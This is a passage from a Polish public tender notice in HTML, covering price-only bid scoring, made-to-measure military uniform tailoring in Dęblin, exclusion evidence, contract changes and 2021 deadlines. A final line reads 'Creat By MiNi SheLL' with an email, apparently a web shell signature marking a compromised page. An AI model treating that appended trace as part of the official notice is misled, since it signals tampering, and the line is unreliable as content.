Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2.	ZADANIE II <br/>Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryteriami i ich znaczeniem (wagą):<br/><br/>X - cena brutto oferty – waga 100%<br/><br/>X = (Cn : Cb) x 100 x 100% (ilość punktów)<br/><br/>gdzie<br/><br/>X - ilość punktów uzyskanych w kryterium „cena brutto oferty”<br/>Cn– najniższa cena brutto spośród ocenianych ofert<br/>Cb – cena brutto oferty ocenianej<br/><br/>Przez „cenę brutto oferty” zamawiający rozumie wartość ogółem brutto - z formularza ofertowego stanowiącego załącznik Nr 1 do SWZ – kolumna 9. Pod pojęciem ceny należy rozumieć cenę w rozumieniu art. 3 ust. 1 pkt 1 i ust. 2 ustawy z dnia 9 maja 2014 r. o informowaniu o cenach towarów i usług (Dz. U. z 2019 r. poz. 178). Za najkorzystniejszą cenę brutto zamawiający uznaje cenę najniższą.<br/><br/>Maksymalna liczba punktów, jaką Wykonawca może uzyskać w kryterium „cena brutto oferty” wynosi 100 punktów.<br/><br/>Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez wykonawców w zakresie wskazanego powyżej kryterium. <br/><br/>Zamawiający zastosuje zaokrąglenie wyników do dwóch miejsc po przecinku, zgodnie <br/>z matematycznymi zasadami zaokrąglania. <br/><br/>Jako najkorzystniejsza zostanie wybrana oferta, która otrzyma największą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. ZADANIE III –- przedmiotem zamówienia jest świadczenie usługi szycia na miarę munduru wyjściowego dla żołnierzy zawodowych i kandydatów na żołnierzy zawodowych.<br/>2. Szczegółowy opis przedmiotu zamówienia określa niniejsza SWZ oraz:<br/>a)	Załącznik Nr 1 do SWZ tj. formularz ofertowy;<br/>b)	Załącznik Nr 1a do SWZ tj. szczegółowy opis przedmiotu zamówienia zawarty <br/>w Wojskowej Dokumentacji Techniczno-Technologicznej (WDTT);<br/>c)	Załącznik Nr 1b do SWZ tj. wykaz przedmiotu zamówienia w danym zadaniu wraz terminami dostaw i ilościami mundurów w danym terminie;<br/>d)	Załącznik Nr 4 do SWZ – ogólne warunki umowy.<br/>3. Umundurowanie zostanie uszyte według określonych wzorów, zgodnie z obowiązującą w 2021 r. Wojskową Dokumentacją Techniczno-Technologiczną (WDTT).<br/>4.	Każdy z dostarczonych przedmiotów umundurowania oznakowany będzie kodem kreskowym zgodnie z Decyzją nr 2/MON z dnia 3 stycznia 2014 roku w sprawie wytycznych określających wymagania w zakresie znakowania kodem kreskowym wyrobów dostarczanych do resortu obrony narodowej.<br/>5.	Szycie umundurowania będzie realizowane w siedzibie Wykonawcy, natomiast wszelkie czynności wstępne, takie jak pomiary antropometryczne oraz przymiarki nastąpią na koszt Wykonawcy na terenie 41.Bazy Lotnictwa Szkolnego w Dęblinie. Wykonawca przed przystąpieniem do szycia umundurowania zobowiązany jest do pobrania wymiarów antropometrycznych od żołnierzy, na podstawie których uszyje umundurowanie.<br/>6.	Szczegółowe terminy pobrania wymiarów antropometrycznych zostaną określone <br/>w kontaktach roboczych, w drodze pisemnej lub telefonicznej, pomiędzy przedstawicielem Zamawiającego - Szefem Służby Mundurowej 41.Bazy Lotnictwa Szkolnego w Dęblinie <br/>a przedstawicielem Wykonawcy, co najmniej na 2 dni (dwa dni) przed planowanym dniem pobrania wymiarów i przymiarek.<br/>7.	Wykonawca musi posiadać zatwierdzony przez Wojskowy Ośrodek Badawczo-Wdrożeniowy Służby Mundurowej w Łodzi - wzór przedmiotu umowy, zgodny z Wojskową Dokumentacją Techniczno-Technologiczną do produkcji seryjnej. <br/>9.	Przedmioty Umowy muszą zostać zgłoszone przez WYKONAWCĘ do odbioru wojskowego. <br/>10.	System zarządzania jakością WYKONAWCY spełnia wymagania zawarte w AQAP 2110 wydanie D wersja 1 – Klauzula Jakościowa stanowi załącznik nr 6 do SWZ oraz załącznik nr 3 do umowy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">98393000-4 - Usługi krawieckie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">50 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">3.	ZADANIE III <br/>Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryteriami i ich znaczeniem (wagą):<br/><br/>X - cena brutto oferty – waga 100%<br/><br/>X = (Cn : Cb) x 100 x 100% (ilość punktów)<br/><br/>gdzie<br/><br/>X - ilość punktów uzyskanych w kryterium „cena brutto oferty”<br/>Cn– najniższa cena brutto spośród ocenianych ofert<br/>Cb – cena brutto oferty ocenianej<br/><br/>Przez „cenę brutto oferty” zamawiający rozumie wartość ogółem brutto - z formularza ofertowego stanowiącego załącznik Nr 1 do SWZ – kolumna 9. Pod pojęciem ceny należy rozumieć cenę w rozumieniu art. 3 ust. 1 pkt 1 i ust. 2 ustawy z dnia 9 maja 2014 r. o informowaniu o cenach towarów i usług (Dz. U. z 2019 r. poz. 178). Za najkorzystniejszą cenę brutto zamawiający uznaje cenę najniższą.<br/><br/>Maksymalna liczba punktów, jaką Wykonawca może uzyskać w kryterium „cena brutto oferty” wynosi 100 punktów.<br/><br/>Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez wykonawców w zakresie wskazanego powyżej kryterium. <br/><br/>Zamawiający zastosuje zaokrąglenie wyników do dwóch miejsc po przecinku, zgodnie <br/>z matematycznymi zasadami zaokrąglania. <br/><br/>Jako najkorzystniejsza zostanie wybrana oferta, która otrzyma największą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Do oferty każdy wykonawca zobowiązany jest dołączyć:<br/>1.1.	Aktualne na dzień składania ofert oświadczenie na podstawie art. 125 ust. 1 ustawy Prawo zamówień publicznych - wg załącznika nr 2 do SWZ – w formie elektronicznej (tj. opatrzone elektronicznym podpisem kwalifikowanym) lub w postaci elektronicznej opatrzonej elektronicznym podpisem zaufanym bądź elektronicznym podpisem osobistym. Informacje zawarte w oświadczeniu będą stanowić wstępne potwierdzenie, że wykonawca nie podlega wykluczeniu z postępowania.<br/>2. Oświadczenie składają odrębnie:<br/>2.1. Wykonawca;<br/>2.2.	Każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia – konsorcja/spółki cywilne (jeżeli dotyczy).<br/>3. Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, następujących podmiotowych środków dowodowych potwierdzających brak podstaw do wykluczenia Wykonawcy:<br/>3.1.	W zakresie potwierdzenia braku podstaw do wkluczenia wykonawcy z postępowania zamawiający zażąda:<br/>3.1.1.	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4) ustawy Pzp; <br/><br/>Zgodnie z treścią art. 274 ust. 4 ustawy Pzp Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne. W związku z powyższym, jeżeli Wykonawca oraz każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia – konsorcja/spółki cywilne – wskaże w oświadczeniu Nr 2 do SWZ bazy, z których Zamawiający bezpłatnie może pozyskać określone dokumenty potwierdzające sytuację podmiotową Wykonawcy – to Zamawiający nie będzie wzywał Wykonawcy do ich złożenia.<br/>4. UWAGA: W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum, spółka cywilna), dokumenty, o których mowa w pkt. 3.1. musi złożyć każdy partner konsorcjum/ wspólnik spółki cywilnej.<br/>5.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa w pkt. 3.1.1. składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokumenty, o których mowa w zdaniu poprzedzającym powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem. <br/>6.	Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 4, lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których mowa w art. 108 ust. 1 pkt 1), 2) i 4), art., 109 ust. 1 pkt 1) ustawy Pzp zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Dotyczy wszystkich zadań:<br/><br/>1.	Zamawiający na podstawie art. 105 ust. 1 ustawy Prawo zamówień publicznych wymaga załączenia do oferty następujących przedmiotowych środków dowodowych: <br/>1.1. oświadczenie Wykonawcy, potwierdzające, że Wykonawca posiada zatwierdzony przez Wojskowy Ośrodek Badawczo-Wdrożeniowy Służby Mundurowej w Łodzi wzór przedmiotu umowy, zgodny z obowiązującą Wojskową Dokumentacją Techniczno-Technologiczną do produkcji seryjnej (wzór oświadczenia stanowi załącznik Nr 3 do SWZ). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych razem z ofertą lub złożone przedmiotowe środki dowodowe będą niekompletne, zamawiający wezwie wykonawców do ich złożenia lub uzupełnienia.<br/>Oferta wykonawcy, który nie złożył i nie uzupełni na wezwanie przedmiotowych środków dowodowych lub złożone na wezwanie przedmiotowe środki dowodowe będą nadal niekompletne – zostanie odrzucona na podstawie art. 226 ust. 1 pkt 2 c) ustawy Prawo zamówień publicznych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia – konsorcja/spółki cywilne zobowiązany jest złożyć::<br/>- Aktualne na dzień składania ofert oświadczenie na podstawie art. 125 ust. 1 ustawy Prawo zamówień publicznych - wg załącznika nr 2 do<br/>SWZ – w formie elektronicznej (tj. opatrzone elektronicznym podpisem kwalifikowanym) lub w postaci elektronicznej opatrzonej elektronicznym podpisem zaufanym bądź elektronicznym podpisem osobistym. Informacje zawarte w oświadczeniach będą stanowić wstępne potwierdzenie, że wykonawca nie podlega wykluczeniu z postępowania;<br/>- odpis lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4) ustawy Pzp;<br/>- Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>- Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, wskazujące, które usługi wykonują poszczególni wykonawcy . <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający dopuszcza możliwość dokonania zmiany postanowień zawartej umowy, <br/>w stosunku do treści oferty, w zakresie:<br/>1) w zakresie zmiany ilości umundurowania przeznaczonego do uszycia, w przypadkach, <br/>o których mowa w § 1 ust. 3 umowy;<br/>2) w zakresie zmiany terminów dostawy umundurowania, w przypadkach, o których mowa w § 3 ust. 5 umowy;<br/>3) w zakresie zmiany cen jednostkowych określonych w formularzu ofertowym w przypadku ustawowych zmian podatku VAT, w zakresie wynikającym z tych zmian;<br/>4) zmiany osób odpowiedzialnych za realizację umowy, jeżeli zajdzie taka potrzeba - <br/>w przypadku rozwiązania lub wygaśnięcia stosunku pracy z daną osobą lub zdarzenia losowego, choroby uniemożliwiającej pełnienie powierzonych jej obowiązków;<br/>5) gdy ze względu na zmianę przepisów prawa (uchylenia, zmiany lub nowelizacji przepisów) lub z innych przyczyn o charakterze obiektywnym nie będzie możliwe spełnienie przez Wykonawcę wymogów lub konieczne będzie spełnienie wymogów dodatkowych;<br/>6) podwykonawcy określonego w § 9 ust. 1;<br/><br/>2.	Zmiana postanowień zawartej umowy wymaga pod rygorem nieważności zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-24 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z dokumentami określonymi w rozdziale 13 pkt 3 SWZ należy złożyć za pośrednictwem platformy pod adresem https://platformazakupowa.pl/pn/41blsz/proceedings , na stronie dotyczącej odpowiedniego postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-24 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-23</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Termin realizacji zamówienia:<br/>a)	ZADANIE I:<br/>Wykonawca zobowiązuje się świadczyć usługę szycia umundurowania w 5 etapach – w terminach określonych poniżej - dostawa przedmiotu umowy w dniach liczonych od dnia podpisania umowy:<br/>- ETAP 1 - 40 dni kalendarzowych <br/>- ETAP 2 - 50 dni kalendarzowych<br/>- ETAP 3 - 50 dni kalendarzowych<br/>- ETAP 4 - 50 dni kalendarzowych<br/>- ETAP 5 - 50 dni kalendarzowych<br/>b)	ZADANIE II:<br/>Wykonawca zobowiązuje się świadczyć usługę szycia umundurowania w 5 etapach – w terminach określonych poniżej - dostawa przedmiotu umowy w dniach liczonych od dnia podpisania umowy:<br/>- ETAP 1 - 40 dni kalendarzowych <br/>- ETAP 2 - 50 dni kalendarzowych<br/>- ETAP 3 - 50 dni kalendarzowych<br/>- ETAP 4 - 50 dni kalendarzowych<br/>- ETAP 5 - 50 dni kalendarzowych<br/>c)	ZADANIE III:<br/>Wykonawca zobowiązuje się świadczyć usługę szycia umundurowania w 5 etapach – w terminach określonych poniżej - dostawa przedmiotu umowy w dniach liczonych od dnia podpisania umowy:<br/>- ETAP 1 - 40 dni kalendarzowych <br/>- ETAP 2 - 50 dni kalendarzowych<br/>- ETAP 3 - 50 dni kalendarzowych<br/>- ETAP 4 - 50 dni kalendarzowych<br/>- ETAP 5 - 50 dni kalendarzowych<br/>2. Dodatkowe informacje:<br/>a)	Zamawiający nie dopuszcza możliwości składania ofert wariantowych;<br/>b)	Zamawiający nie dopuszcza składania ofert w postaci katalogów elektronicznych lub dołączenia katalogów elektronicznych do oferty;<br/>c)	każdy Wykonawca może złożyć tylko po jednej ofercie na dane zadanie;<br/>d)	Zamawiający nie określa wymagań w zakresie zatrudnienia osób, o których mowa w art. 96 ust. 2 pkt. 2) ustawy Pzp;<br/>e)	Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia;<br/>f)	Zamawiający nie zastrzega możliwości ubiegania się o udzielenie zamówienia wyłącznie przez Wykonawców, o których mowa w art. 94 ust. 1 ustawy Pzp;<br/>g)	Zamawiający nie przewiduje udzielania zaliczek na poczet realizacji zamówienia przez Wykonawcę;<br/>h)	Zamawiający nie przewiduje zawarcia umowy ramowej; <br/>i)	Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów;<br/>j)	Zamawiający nie przewiduje wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej;<br/>k)	Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu. Zamawiający nie przewiduje rozliczeń w walutach obcych;<br/>l)	postępowanie o udzielenie zamówienia prowadzi się w języku polskim;<br/>m)	Zamawiający nie przewiduje możliwości udzielenia dotychczasowemu wykonawcy dodatkowych dostaw, o których mowa w art. 214 ust. 1 pkt 8 ustawy Pzp, zgodnych z przedmiotem zamówienia podstawowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com